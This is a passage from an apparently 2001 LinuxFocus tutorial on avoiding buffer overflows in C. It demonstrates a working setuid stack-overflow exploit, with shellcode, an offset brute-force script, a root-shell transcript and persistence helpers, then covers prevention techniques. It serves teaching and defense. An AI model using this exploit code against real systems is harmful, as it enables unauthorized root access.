<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
 <META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
 <META NAME="GENERATOR" CONTENT="lfparser_2.13">
 <META NAME="LFCATEGORY" CONTENT="Software Development">
<!-- this is used be a number of tools:
 =LF=AUTHOR:  Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier
 =LF=CAT___: Software Development
 =LF=TITLE_: Avoiding security holes when developing an application - Part 3 : buffer overflows
 =LF=NUMBER: 190
 =LF=ANAME_: article190.shtml
 -->
 <TITLE>lf190, Software Development: Avoiding security holes when developing an application - Part 3 : buffer overflows</TITLE>
<!-- stylesheet added by lfparser: --> 
<style type="text/css">
<!--
 td.top {font-family: Arial,Geneva,Verdana,Helvetica,sans-serif; }
 pre { font-family:monospace,Courier }
 p.cl { color:#EE9500 }
 a.nodec { text-decoration:none }
 p.trans { font-size:8pt; text-align:right }
 p.clbox { width:50%; alignment:center; background-color:#FFD700; border-style:none; border-width:medium; border-color:#FFD700; padding:0.5cm ;  text-align:center }
 p.foot { background-color:#AAAAAA; color:#FFFFFF; border-style:none; border-width:medium; border-color:#AAAAAA; padding:0.5cm ; margin-top:0.1cm; margin-right:1cm; margin-left:1cm; text-align:center }
-->
</style>
 
</HEAD>
<BODY bgcolor="#ffffff" text="#000000">
 <!-- this is generated html code. NEVER use this file for your
 translation work. Instead get the file with the same article number
 and .meta.shtml in its name. Translate this meta file and then
 use lfparser program to generate the final article -->
 <!-- lfparser can be obtained from http://main.linuxfocus.org/~guido/dev/lfparser.html -->

<!-- 2pdaIgnoreStart -->

<!-- start navegation bar -->
 <!-- top navegation bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center" width="90%">
   <TR bgcolor="#2e2292">
     <TD class="top"><TABLE cellspacing="0" cellpadding="0" border="0" width=
       "100%">
         <TR><TD width="144"><IMG src="../../common/images/logolftop.gif"
           alt="[LinuxFocus-icon]" width="350" height="45" align="left" 
           border="0"></TD>

           <TD class="top">
             <TABLE width="100%">
               <TR align="right">
                 <TD class="top"><A class="nodec" href="../index.shtml"><FONT color=
                 "#DDDDDD">Home</FONT></A> &nbsp;|&nbsp; <A class=
                 "nodec" href="../map.html"><FONT color=
                 "#DDDDDD">Map</FONT></A> &nbsp;|&nbsp; <A class=
                 "nodec" href="../indice.html"><FONT color=
                 "#DDDDDD">Index</FONT></A> &nbsp;|&nbsp; <A class="nodec" href="../Search/index.html"><FONT color=
                 "#DDDDDD">Search</FONT></A> </TD>
               </TR>

               <TR align="right">
                 <TD class="top">
                   <HR width="100%" noshade size="1">
                 </TD>
               </TR>
             </TABLE>
           </TD>
         </TR>
       </TABLE>
     </TD>
   </TR>
 </TABLE>
 <!-- end top navegation bar -->
 <!-- blue bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center"
 width="90%">
   <TR bgcolor="#00ffff">
     <TD><IMG src="../../common/images/transpix.gif" width="1" height=
     "2" alt=""></TD>
   </TR>
 </TABLE>
 <!-- end blue bar -->
 <!-- bottom navegation bar -->
 <TABLE cellspacing="0" cellpadding="0" border="0" align="center"
 width="94%">
   <TR bgcolor="#000000">
     <TD>
       <TABLE cellspacing="0" cellpadding="1" border="0" width=
       "100%">
         <TR align="center">
           <TD class="top"><A class="nodec" href="../News/index.html"><FONT color=
           "#FFFFFF">News</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../Archives/index.html"><FONT color=
           "#FFFFFF">Archives</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../Links/index.html"><FONT color=
           "#FFFFFF">Links</FONT></A> </TD>
           <TD><FONT color="#FFFFFF">|</FONT> </TD>
           <TD><A class="nodec" href="../aboutus.html"><FONT color=
           "#FFFFFF">About LF</FONT></A> </TD>
           <TD>&nbsp;</TD>
         </TR>
       </TABLE>
     </TD>
   </TR>
 </TABLE>
 <!-- end bottom navegation bar -->
<!-- stop navegation bar -->

<!-- SSI_INFO -->

<!-- tr_staticssi include virtual -->
<!-- tr_staticssi exec cmd -->
<!-- addedByLfdynahead ver 1.1 --><TABLE ALIGN="right" border=0><TR><TD ALIGN="right"><FONT SIZE="-1" FACE="Arial,Helvetica">This article is available in: <A href="../../English/May2001/article190.shtml">English</a> &nbsp;<A href="../../Castellano/May2001/article190.shtml">Castellano</a> &nbsp;<A href="../../Deutsch/May2001/article190.shtml">Deutsch</a> &nbsp;<A href="../../Francais/May2001/article190.shtml">Francais</a> &nbsp;<A href="../../Nederlands/May2001/article190.shtml">Nederlands</a> &nbsp;<A href="../../Portugues/May2001/article190.shtml">Portugues</a> &nbsp;<A href="../../Russian/May2001/article190.shtml">Russian</a> &nbsp;<A href="../../Turkce/May2001/article190.shtml">Turkce</a> &nbsp;</FONT></TD></TR></TABLE><br>
 

<!-- 2pdaIgnoreStop -->

<!-- SHORT BIO ABOUT THE AUTHOR -->
<TABLE ALIGN=LEFT BORDER=0 hspace=4 vspace=4 WIDTH="30%" >
<TR>
<TD>

<!-- 2pdaIgnoreStart -->
<!-- PALM DOC -->
<TABLE BORDER=0 hspace=4 vspace=4> <TR> <TD>
<font size=1> <img src="../../common/images/2doc.gif" width=34 align=left border=0 height=22 alt="convert to palm"><a href="http://cgi.linuxfocus.org/cgi-bin/2ztxt">Convert to GutenPalm</a><br>or <a href="http://cgi.linuxfocus.org/cgi-bin/2pda">to PalmDoc</a></font>
</TD> </TR> </TABLE>
<!-- END PALM DOC -->
<!-- 2pdaIgnoreStop -->
<br>
<IMG src="../../common/images/FredCrisBCrisG.jpg" alt=
"[image of the authors]" width="200" height="150">
<BR>by  <A href= "mailto:pappy&#64;users.sourceforge.net,ccb@club-internet.fr,grenier@nef.esiea.fr"> Fr&eacute;d&eacute;ric Raynal, Christophe Blaess, Christophe Grenier</A>
<BR><BR>
<I>About the author:</I><BR>
<P>Christophe Blaess is an independent aeronautics engineer. He is a
Linux fan and does much of his work on this system. He coordinates the
translation of the man pages as published by the <I>Linux Documentation
Project</I>.</P><P>Christophe Grenier is a 5th year student at the ESIEA, where he
also works as a sysadmin. He has a passion for computer security.</P><p>Fr&eacute;d&eacute;ric Raynal has been using Linux for several years
because it doesn't pollute, use hormones, MSG or
animal bone-meal... only sweat and cunning.</p>
<BR><i>Content</i>:
<UL>
  <LI><A HREF="#190lfindex0">Buffer overflows</A></LI>
  <LI><A HREF="#190lfindex1">Position in memory</A></LI>
  <LI><A HREF="#190lfindex2">Launch program</A></LI>
  <LI><A HREF="#190lfindex3">shell(s) problems</A></LI>
  <LI><A HREF="#190lfindex4">Prevention</A></LI>
  <LI><A HREF="#190lfindex5">Checking indexes</A></LI>
  <LI><A HREF="#190lfindex6">Using n functions</A></LI>
  <LI><A HREF="#190lfindex7">Validating the data in two steps</A></LI>
  <LI><A HREF="#190lfindex8">Using dynamic buffers</A></LI>
  <LI><A HREF="#190lfindex9">Conclusion</A></LI>
  <LI><A HREF="#190lfindex10">Links</A></LI>
  <LI><A HREF="http://cgi.linuxfocus.org/cgi-bin/lftalkback?anum=190&amp;lang=en">Talkback form for this article</A></LI>
</UL>

</TD></TR></TABLE>
<!-- HEAD OF THE ARTICLE -->
<br>&nbsp;
<H2>Avoiding security holes when developing an application - Part 3 : buffer overflows</H2>
 <IMG src="../../common/images/illustration183.gif" width="100" height=
"100" alt="[article illustration]" hspace="10">
<!-- ABSTRACT OF THE ARTICLE -->
<P><i>Abstract</i>:
<P>


In this article we introduce a real buffer overflow in an application.
We'll show that it's an easily exploitable
security hole and how to avoid it.
This article assumes that you have read the 2 previous articles:
<ul><li><a href="../January2001/article182.shtml">Avoiding security holes when developing an application - Part 1</a></li><li><a href="../March2001/article183.shtml">Avoiding security holes when developing an application - Part 2: memory, stack and functions, shellcode</a></li></ul>
<HR size="2" noshade align="right"><BR>
<!-- BODY OF THE ARTICLE -->


<A NAME="190lfindex0">&nbsp;</A>
<H3>Buffer overflows</H3>



<P>In our previous article we wrote a small program of about 50 bytes
that was able to start a shell, or to exit in case of failure. Now we must
insert this code into the application we want to attack. This is done
by overwriting the return address of a function, replacing it with our
shellcode address. You do this by forcing the overflow of an automatic
variable allocated in the process stack.</P>

<P>For example, in the following program, we copy the string given as
first argument in the command line to a 500 byte buffer. This copy is
done without checking if it's larger than the buffer size. As we'll see
later on, using the <CODE>strncpy()</CODE> function allows us to avoid
this problem.</P>

<PRE>
  /* vulnerable.c */

  #include &lt;string.h&gt;

  int main(int argc, char * argv [])
  {
    char buffer [500];

    if (argc &gt; 1)
    strcpy(buffer, argv[1]);
    return (0);
  }
</PRE>

<P><CODE>buffer</CODE> is an automatic variable, the space used by the
500&nbsp;bytes is reserved in the stack as soon as we enter the
<CODE>main()</CODE> function. When running the <CODE>vulnerable</CODE>
program with an argument longer than 500 characters, the data overflows
the buffer and "invades" the process stack. As we've seen before, the
stack holds the address of the next instruction to be executed (aka
<EM>return address</EM>). To exploit this security hole, it is enough to
replace the return address of the function with the shellcode address
we want to execute. This shellcode is inserted into the body of the buffer,
followed by its address in memory.</P>

<A NAME="190lfindex1">&nbsp;</A>
<H2>Position in memory</H2>



<P>Getting the memory address of the shellcode is rather tricky. We
must discover the offset between the <CODE>%esp</CODE> register
pointing to the top of the stack and the shellcode address. To give
ourselves a margin of safety, the beginning of the buffer is filled with
the <CODE>NOP</CODE> assembly instruction; it's a one-byte neutral
instruction having no effect at all. Thus, when the starting address
points before the true beginning of the shellcode, the CPU goes from
<CODE>NOP</CODE> to <CODE>NOP</CODE> until it reaches our code. To
improve our chances, we put the shellcode in the middle of the buffer,
preceded by a <CODE>NOP</CODE> block and followed by the starting
address repeated until the end. <A href="#buffer">Diagram 1</A>
illustrates this:</P>


<CENTER>
<TABLE width="90%" nosave="">
<CAPTION align="BOTTOM"><A name="buffer" href="#buffer">Diag. 1</A> :
buffer especially filled up for the exploit.</CAPTION>

<TR>
<TD><IMG src="../../common/images/article190/art_03_01.gif" alt=
"[buffer]"></TD>
</TR>
</TABLE>
</CENTER>

<BR>
<BR>
<P><A href="#avt_apr">Diagram 2</A> describes the state of the stack
before and after the overflow. It causes all the saved information
(saved <CODE>%ebp</CODE>, saved <CODE>%eip</CODE>, arguments,...) to be
replaced with the new expected return address: the start address
of the part of the buffer where we put the shellcode.
</P>

<CENTER>
<TABLE width="80%" border="2" cols="2" nosave="">
<CAPTION align="BOTTOM"><A name="avt_apr" href="#avt_apr">Diag. 2</A> :
state of the stack before and after the overflow</CAPTION>

<TR>
<TD>
<CENTER><IMG src="../../common/images/article190/pile_bef.gif" alt=
"[stack before the overflow]"></CENTER>
</TD>
<TD>
<CENTER><IMG src="../../common/images/article190/pile_aft.gif" alt=
"[stack after the overflow]"></CENTER>
</TD>
</TR>

<TR>
<TD>
<CENTER>Before</CENTER>
</TD>
<TD>
<CENTER>After</CENTER>
</TD>
</TR>
</TABLE>
</CENTER>

<BR>
<BR>
<P>However, there is another problem related to variable alignment
within the stack. An address is longer than 1 byte and is therefore stored
across several bytes, so the addresses we write do not necessarily line up
with the slot holding the return address.
Trial and error finds the right alignment. Since our
CPU uses 4-byte words, the alignment is 0, 1, 2 or 3 bytes (check <A
href="../March2001/article183.shtml">Part 2 = article 183</A> about stack
organization). In <A href="#aligne">diagram 3</A>, the grayed parts
correspond to the written 4 bytes. The first case, where the return
address is overwritten completely with the right alignment, is the only one that will work. The others lead to
<CODE>segmentation violation</CODE> or <CODE>illegal instruction</CODE>
errors. This empirical way of searching works fine since today's computing
power allows us to do this kind of testing.</P>

<CENTER>
<TABLE width="90%" nosave="">
<CAPTION align="BOTTOM"><A name="aligne" href="#aligne">Diag. 3</A> :
possible alignments with 4-byte words</CAPTION>

<TR>
<TD><IMG src="../../common/images/article190/align-en.png" alt=
"[align]"></TD>
</TR>
</TABLE>
</CENTER>

<A NAME="190lfindex2">&nbsp;</A>
<H2>Launch program</H2>



<P>We are going to write a small program to launch a vulnerable
application, feeding it data which will overflow the stack. This program
has various options to set the position of the shellcode in memory and to choose
which program to run. This version, inspired by Aleph One's article in
<EM>Phrack</EM> magazine issue 49, is available from Christophe Grenier's
website.</P>

<P>How do we send our prepared buffer to the target application ?
Usually, you can use a command line parameter like the one in
<CODE>vulnerable.c</CODE> or an environment variable. The overflow
can also be caused by typing in the data or just reading it from a file.</P>

<P>The <CODE>generic_exploit.c</CODE> program starts by allocating a
buffer of the right size, then copies the shellcode into it and fills it up
with the addresses and the NOP codes as explained above. It then
prepares an argument array and runs the target application using the
<CODE>execve()</CODE> call, which replaces the current
process with the invoked one. The <CODE>generic_exploit</CODE> program
needs to know
the size of the buffer to exploit (a bit bigger than its real size
to be able to overwrite the return address), the memory offset and the
alignment. We indicate whether the buffer is passed as an environment
variable (<CODE>var</CODE>) or from the command line
(<CODE>novar</CODE>). The <CODE>force/noforce</CODE> argument determines whether
the shellcode calls the <CODE>setuid()/setgid()</CODE> functions.</P>

<PRE>
<small>
/* generic_exploit.c */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/stat.h&gt;
#define NOP                     0x90

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\xff\x31\xc0\x88\x46\xff\x89\x46\xff\xb0\x0b"
        "\x89\xf3\x8d\x4e\xff\x8d\x56\xff\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff";

unsigned long get_sp(void)
{
   __asm__("movl %esp,%eax");
}

#define A_BSIZE     1
#define A_OFFSET    2
#define A_ALIGN     3
#define A_VAR       4
#define A_FORCE     5
#define A_PROG2RUN  6
#define A_TARGET    7
#define A_ARG       8

int main(int argc, char *argv[])
{
   char *buff, *ptr;
   char **args;
   long addr;
   int offset, bsize;
   int i,j,n;
   struct stat stat_struct;
   int align;
   if(argc &lt; A_ARG)
   {
      printf("USAGE: %s bsize offset align (var / novar)
             (force/noforce) prog2run target param\n", argv[0]);
      return -1;
   }
   if(stat(argv[A_TARGET],&amp;stat_struct))
   {
     printf("\nCannot stat %s\n", argv[A_TARGET]);
     return 1;
   }
   bsize  = atoi(argv[A_BSIZE]);
   offset = atoi(argv[A_OFFSET]);
   align  = atoi(argv[A_ALIGN]);

   if(!(buff = malloc(bsize)))
   {
      printf("Can't allocate memory.\n");
      exit(0);
   }

   addr = get_sp() + offset;
   printf("bsize %d, offset %d\n", bsize, offset);
   printf("Using address: 0lx%lx\n", addr);

   for(i = 0; i &lt; bsize; i+=4) *(long*)(&amp;buff[i]+align) = addr;

   for(i = 0; i &lt; bsize/2; i++) buff[i] = NOP;

   ptr = buff + ((bsize/2) - strlen(shellcode) - strlen(argv[4]));
   if(strcmp(argv[A_FORCE],"force")==0)
   {
     if(S_ISUID&amp;stat_struct.st_mode)
     {
       printf("uid %d\n", stat_struct.st_uid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_uid &amp; 0xFF)
       {
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_uid;
       }
       if(stat_struct.st_uid &amp; 0xFF00)
       {
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_uid;
       }
       *(ptr++)= 0xb0;          /* movb $0x17,%al   */
       *(ptr++)= 0x17;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
     }
     if(S_ISGID&amp;stat_struct.st_mode)
     {
       printf("gid %d\n", stat_struct.st_gid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_gid &amp; 0xFF)
       {
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_gid;
       }
       if(stat_struct.st_gid &amp; 0xFF00)
       {
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_gid;
       }
       *(ptr++)= 0xb0;          /* movb $0x2e,%al   */
       *(ptr++)= 0x2e;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
     }
   }
   /* Patch shellcode */
   n=strlen(argv[A_PROG2RUN]);
   shellcode[13] = shellcode[23] = n + 5;
   shellcode[5] = shellcode[20] = n + 1;
   shellcode[10] = n;
   for(i = 0; i &lt; strlen(shellcode); i++) *(ptr++) = shellcode[i];
   /* Copy prog2run */
   printf("Shellcode will start %s\n", argv[A_PROG2RUN]);
   memcpy(ptr,argv[A_PROG2RUN],strlen(argv[A_PROG2RUN]));

   buff[bsize - 1] = '\0';

   args = (char**)malloc(sizeof(char*) * (argc - A_TARGET + 3));
   j=0;
   for(i = A_TARGET; i &lt; argc; i++)
     args[j++] = argv[i];
   if(strcmp(argv[A_VAR],"novar")==0)
   {
     args[j++]=buff;
     args[j++]=NULL;
     return execve(args[0],args,NULL);
   }
   else
   {
     setenv(argv[A_VAR],buff,1);
     args[j++]=NULL;
     return execv(args[0],args);
   }
}
</small>
</PRE>

<P>To take advantage of <CODE>vulnerable.c</CODE>, we must have a buffer
bigger than the one expected by the application. For instance, we select
600 bytes instead of the 500 expected. We find the offset relative to
the top of the stack by successive tests. The address built
with the <CODE>addr = get_sp() + offset;</CODE> instruction is used to
overwrite the return address; you get it right ... with a bit of luck! The
operation relies on the heuristic that the <CODE>%esp</CODE> register
won't move too much between the current process and the one called at
the end of the program. In practice, nothing is certain: various
events might modify the stack state between the time of the computation
and the time the program to exploit is called. Here, we succeeded
in triggering an exploitable overflow with a -1900 byte offset. Of
course, to complete the experiment, the <CODE>vulnerable</CODE> target
must be Set-UID <EM>root</EM>.</P>

<PRE>
  $ cc vulnerable.c -o vulnerable
  $ cc generic_exploit.c -o generic_exploit
  $ su
  Password:
  # chown root.root vulnerable
  # chmod u+s vulnerable
  # exit
  $ ls -l vulnerable
  -rws--x--x   1 root     root        11732 Dec  5 15:50 vulnerable
  $ ./generic_exploit 600 -1900 0 novar noforce /bin/sh ./vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe54
  Shellcode will start /bin/sh
  bash# id
  uid=1000(raynal) gid=100(users) euid=0(root) groups=100(users)
  bash# exit
  $ ./generic_exploit 600 -1900 0 novar force /bin/sh /tmp/vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe64
  uid 0
  Shellcode will start /bin/sh
  bash# id
  uid=0(root) gid=100(users) groups=100(users)
  bash# exit
</PRE>

In the first case (<CODE>noforce</CODE>), our <CODE>uid</CODE> doesn't
change. Nevertheless we have a new <CODE>euid</CODE> providing us with
all the rights. Thus, even if <CODE>vi</CODE> says while
editing
<CODE>/etc/passwd</CODE> that it is read only we can still write the file
and all the changes will work :
you just have to force
the writing with <CODE>w!</CODE> :) The <CODE>force</CODE> parameter
allows <CODE>uid=euid=0</CODE> from start.

<P>To automatically find offset values for an overflow we can
use the following small shell script:</P>

<PRE>
 #! /bin/sh
 # find_exploit.sh
  BUFFER=600
  OFFSET=$BUFFER
  OFFSET_MAX=2000
  while [ $OFFSET -lt $OFFSET_MAX ] ; do
    echo "Offset = $OFFSET"
    ./generic_exploit $BUFFER $OFFSET 0 novar force /bin/sh ./vulnerable
    OFFSET=$(($OFFSET + 4))
  done
</PRE>

In our exploit we didn't take into account the potential alignment
problems. It's therefore possible that this example doesn't work for you
with the same values, or doesn't work at all because of the alignment.
(For those wanting to test anyway, the alignment parameter has to be
changed to 1, 2 or 3 (here, 0).) Some systems don't accept writes to
memory areas that are not aligned on a whole word, but this is not true for Linux.

<A NAME="190lfindex3">&nbsp;</A>
<H2>shell(s) problems</H2>



<P>Unfortunately, sometimes the obtained shell is unusable since it
ends on its own or when pressing a key. We use another program
to keep privileges that we so carefully acquired:</P>

<PRE>
/* set_run_shell.c */
#include &lt;unistd.h&gt;
#include &lt;sys/stat.h&gt;

int main()
{
  chown ("/tmp/run_shell", geteuid(), getegid());
  chmod ("/tmp/run_shell", 06755);
  return 0;
}
</PRE>

<P>Since our exploit is only able to do one task at a time, we are
going to transfer the rights gained to the <CODE>run_shell</CODE>
program with the help of the <CODE>set_run_shell</CODE> program. We'll
then get the desired shell.</P>

<PRE>
/* run_shell.c */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

int main()
{
  setuid(geteuid());
  setgid(getegid());
  execl("/tmp/shell","shell","-i",0);
  exit (0);
}
</PRE>

The <CODE>-i</CODE> option corresponds to <CODE>interactive</CODE>. Why
not give the rights directly to a shell? Just because the
<CODE>s</CODE> bit is not honored by every shell. The recent
versions check that uid is equal to euid, and likewise for gid and egid. Thus
<CODE>bash2</CODE> and <CODE>tcsh</CODE> incorporate this line of defense,
but neither <CODE>bash</CODE> nor <CODE>ash</CODE> has it. This
method must be refined when the partition on which
<CODE>run_shell</CODE> is located (here, <CODE>/tmp</CODE>) is mounted
<CODE>nosuid</CODE> or <CODE>noexec</CODE>.

<A NAME="190lfindex4">&nbsp;</A>
<H2>Prevention</H2>



<P>Since we have a Set-UID program with a buffer overflow bug and its
source code, we are able to prepare an attack allowing execution of
arbitrary code under the ID of the file owner. However, our goal is to
avoid security holes. Now we are going to examine a few rules to
prevent buffer overflows.</P>

<A NAME="190lfindex5">&nbsp;</A>
<H2>Checking indexes</H2>



<P>The first rule to follow is just a matter of good sense : the
indexes used to manipulate an array must always be checked carefully. A
"clumsy" loop like :</P>

<PRE>
  for (i = 0; i &lt;= n; i ++) {
    table [i] = ...
</PRE>

probably holds an error because of the <CODE>&lt;=</CODE> sign instead
of <CODE>&lt;</CODE>, since an access is done beyond the end of the
array. While the mistake is easy to see in that loop, it's more difficult
with a loop using decreasing indexes, since you must ensure that you are not going
below zero. Apart from the trivial <CODE>for(i=0; i&lt;n ; i++)</CODE>
case, you must check the algorithm several times (or even ask someone else to check it for
you), especially when the index is modified inside the loop.

<P>The same type of problem is found with strings : you must always
remember to add one more byte for the final null character.
One of the newbie's most frequent mistakes lies in forgetting the string terminator.
Worse, it's hard
to diagnose since unpredictable variable alignments (e.g. compiling with
debug information) can hide the problem.</P>

<P>Don't underestimate array indexes as a threat to application
security. We have seen (check <EM>Phrack</EM> issue 55)
that a one-byte overflow is enough to create a security hole,
by inserting the shellcode into an environment variable, for instance.</P>

<PRE>
  #define BUFFER_SIZE 128

  void foo(void) {

    char buffer[BUFFER_SIZE+1];
    int i;

    /* end of string */
    buffer[BUFFER_SIZE] = '\0';

    for (i = 0; i&lt;BUFFER_SIZE; i++)
      buffer[i] = ...
  }
</PRE>

<A NAME="190lfindex6">&nbsp;</A>
<H2>Using n functions</H2>



As a convention, standard C library functions are aware of the end of
the string because of a null byte. For example, the
<CODE>strcpy(3)</CODE> function copies the
original string content
into a destination string until it reaches this null byte. In some cases,
this behavior becomes dangerous; we have seen the following code contains
a security hole :

<PRE>
  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT];
    strcpy (identity, name);
    ...
  }
</PRE>

Functions that limit the copy length avoid this problem.
These functions have an `<CODE>n</CODE>' in the middle of their name,
for instance <CODE>strncpy(3)</CODE> as a replacement for
<CODE>strcpy(3)</CODE>, <CODE>strncat(3)</CODE> for
<CODE>strcat(3)</CODE> or even <CODE>strnlen(3)</CODE> for
<CODE>strlen(3)</CODE>.

<P>However, you must be careful with the <CODE>strncpy(3)</CODE>
limitation since it has side effects : when the source string is
shorter than the limit, the copy will be padded with null
characters up to the <EM>n</EM> limit, which makes the application
slower. On the other hand, if the source string is longer, it will be
truncated and the copy will then not end
with a null character. You must then add it manually. Taking
this into account, the previous routine becomes :</P>

<PRE>
  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT+1];
    strncpy (identity, name, LG_IDENT);
    identity [LG_IDENT] = '\0';
    ...
  }
</PRE>

Of course, the same principles apply to routines manipulating wide
characters (more than 8 bits), for instance <CODE>wcsncpy(3)</CODE> should be preferred to
<CODE>wcscpy(3)</CODE> or <CODE>wcsncat(3)</CODE> to
<CODE>wcscat(3)</CODE>. Sure, the program gets bigger but the security
improves, too.

<P>Like <CODE>strcpy()</CODE>, <CODE>strcat(3)</CODE> doesn't check
buffer size. The <CODE>strncat(3)</CODE> function appends at most
<EM>n</EM> characters and then always adds a terminating null character,
so <EM>n</EM> must be the room still free in the destination, not its
total size. Replacing
<CODE>strcat(buffer1, buffer2);</CODE> with <CODE>strncat(buffer1,
buffer2, sizeof(buffer1)-strlen(buffer1)-1);</CODE> eliminates the
risk.</P>

<P>The <CODE>sprintf()</CODE> function copies formatted data
into a string. It also has a version which limits the number of
bytes written : <CODE>snprintf()</CODE>. This function returns the
number of characters that would have been written into the destination
string had it been large enough (without
taking into account the `\0'). Testing this return value tells you
if the writing has been done properly :</P>

<PRE>
  if (snprintf(dst, sizeof(dst), "%s", src) &gt;= sizeof(dst)) {
    /* Overflow */
    ...
  }
</PRE>

<P>Obviously, this protection is worthless as soon as the user gets
control of the number of bytes to copy. Such a hole in BIND (Berkeley
Internet Name Domain) kept a lot of crackers busy :</P>

<PRE>
  struct hostent *hp;
  unsigned long address;

  ...

  /* copy of an address */
  memcpy(&amp;address, hp-&gt;h_addr_list[0], hp-&gt;h_length);
  ...

</PRE>

This should always copy 4 bytes. Nevertheless, if you can change
<CODE>hp-&gt;h_length</CODE>, then you are able to modify the stack.
Accordingly, it's compulsory to check the data length before copying :

<PRE>
  struct hostent *hp;
  unsigned long address;

  ...

  /* test */
  if (hp-&gt;h_length &gt; sizeof(address))
    return 0;

  /* copy of an address */
  memcpy(&amp;address, hp-&gt;h_addr_list[0], hp-&gt;h_length);
  ...
</PRE>

In some circumstances it's impossible to truncate that way (path,
hostname, URL...) and things have to be done earlier in the program as
soon as data is typed.

<A NAME="190lfindex7">&nbsp;</A>
<H2>Validating the data in two steps</H2>



When a program runs with privileges other than those of its user, you
must protect all of its data and
consider all incoming data suspicious.

<P>First of all, this concerns string input routines. After
what we just said, we hardly need to insist that you <EM>never</EM>
use <CODE>gets(char *array)</CODE>, since the string length is not
checked (authors' note : this routine should be forbidden by the
linker for newly compiled programs). More insidious risks are hidden in
<CODE>scanf()</CODE>. The line</P>

<PRE>
scanf ("%s", string);
</PRE>

is as dangerous as <CODE>gets(char *array)</CODE>, but it
isn't so obvious. But functions from the <CODE>scanf()</CODE>
family offer a control mechanism on the data size :

<PRE>
  char buffer[256];
  scanf("%255s", buffer);
</PRE>

This formatting limits  the number of characters copied into
<CODE>buffer</CODE> to 255. On the other hand, <CODE>scanf()</CODE> puts
the characters it doesn't like back into the incoming stream so
the risks of programming
errors generating locks are rather high.

<P>Using C++, the <CODE>cin</CODE> stream replaces the classical functions
used in C (even if you can still use them). The following program fills
a buffer :</P>

<PRE>
  char buffer[500];
  cin&gt;&gt;buffer;
</PRE>

As you can see, it does no tests! We are in a situation similar to
<CODE>gets(char *array)</CODE> in C : a door is wide open.
The <CODE>ios::width()</CODE> member function sets the maximum
number of characters to read.

<P>The reading of data requires two steps. A first phase consists of
getting the string with <CODE>fgets(char *array, int size, FILE
*stream)</CODE>, which limits the size of the memory area used. Next, the
data read is formatted, through <CODE>sscanf()</CODE> for example. The
first phase can do more, such as inserting <CODE>fgets(char *array,
int size, FILE *stream)</CODE> into a loop automatically allocating
the required memory, without arbitrary limits. The GNU extension
<CODE>getline()</CODE> can do that for you. It's also possible to
validate the typed characters using <CODE>isalnum()</CODE>,
<CODE>isprint()</CODE>, etc. The <CODE>strspn()</CODE> function allows
effective filtering. The program becomes a bit slower, but the
sensitive parts of the code are protected from illegal
data with a bulletproof jacket.</P>

<P>Direct data typing is not the only attackable entry point. The
software's data files are vulnerable, but the code written to read them
is usually stronger than the one for console input since programmers intuitively
don't trust file content provided by the user.</P>

<P>Buffer overflow attacks often rely on something else :
environment strings. We must not forget that a programmer can fully
configure a process environment before launching it. The convention
saying an environment string must be of the "<CODE>NAME=VALUE</CODE>"
type can be exploited by an ill-intentioned user. Using the
<CODE>getenv()</CODE> routine requires some caution, especially
regarding the length of the returned string (arbitrarily long) and its content
(where you can find any character, `<CODE>=</CODE>' included). The
string returned by <CODE>getenv()</CODE> must be treated like the one
provided by <CODE>fgets(char *array, int size, FILE *stream)</CODE>,
taking care of its length and validating it one character after the
other.</P>

<P>Using such filters is done like accessing a computer : default is to
forbid everything ! Next, you can allow a few things :</P>

<PRE>
  /* Whitelist of characters accepted in an environment value.
     Adjacent string literals are concatenated by the compiler; unlike a
     backslash-newline inside a single literal, this does not pull the
     indentation spaces of the following lines into the set. */
  #define GOOD "abcdefghijklmnopqrstuvwxyz" \
               "ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
               "1234567890_"

  /* Needs stdlib.h (getenv) and string.h (strspn).

     Returns the value of the environment variable var with every
     character outside GOOD replaced by '_', or NULL when the variable
     is not set. The value is filtered in place: no copy is made, so
     the returned pointer refers to the string handed back by getenv()
     and must not be freed. */
  char *my_getenv(char *var) {
    char *data, *ptr;

    /* Getting the data */
    data = getenv(var);
    if (data == NULL)
      return NULL;

    /* Filtering
       Rem : obviously the replacement character must be
             in the list of the allowed ones !!!
       strspn() skips the leading run of allowed characters, so after
       each step ptr is either on an illegal character or on the
       terminating '\0', which ends the loop.
    */
    for (ptr = data; *(ptr += strspn(ptr, GOOD));)
      *ptr = '_';

    return data;
  }
</PRE>

<P>The <CODE>strspn()</CODE> function makes it easy: it looks for the
